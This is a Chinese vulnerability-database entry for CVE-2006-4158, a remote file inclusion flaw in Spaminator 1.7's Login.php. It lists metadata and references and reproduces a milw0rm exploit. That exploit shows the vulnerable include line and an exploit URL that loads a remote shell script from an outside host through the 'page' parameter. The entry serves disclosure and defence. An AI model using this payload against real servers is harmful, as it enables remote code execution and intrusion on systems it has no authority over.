Spaminator 'Login.php' Page参数远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110803 漏洞类型 输入验证
发布时间 2006-08-10 更新时间 2006-08-17
CVE编号 CVE-2006-4158 CNNVD-ID CNNVD-200608-251
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2165
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-251
|漏洞详情
Spaminator1.7及早期版本的Login.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助page参数中的URL执行任意PHP代码。
|漏洞EXP
Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC
BuG Found By Drago84

SourcE CodE:
http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz

Page Affect is:
/src/Login.php

Problem is
   include "$page.php";

Path :
Declare $page

ExpL:
http://server/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?

Greatz:str0ke

# milw0rm.com [2006-08-10]
|参考资料

来源:XF
名称:spaminator-login-file-include(28312)
链接:http://xforce.iss.net/xforce/xfdb/28312
来源:BID
名称:19466
链接:http://www.securityfocus.com/bid/19466
来源:VUPEN
名称:ADV-2006-3256
链接:http://www.frsirt.com/english/advisories/2006/3256
来源:SECUNIA
名称:21469
链接:http://secunia.com/advisories/21469
来源:MILW0RM
名称:2165
链接:http://milw0rm.com/exploits/2165
来源:OSVDB
名称:27893
链接:http://www.osvdb.org/27893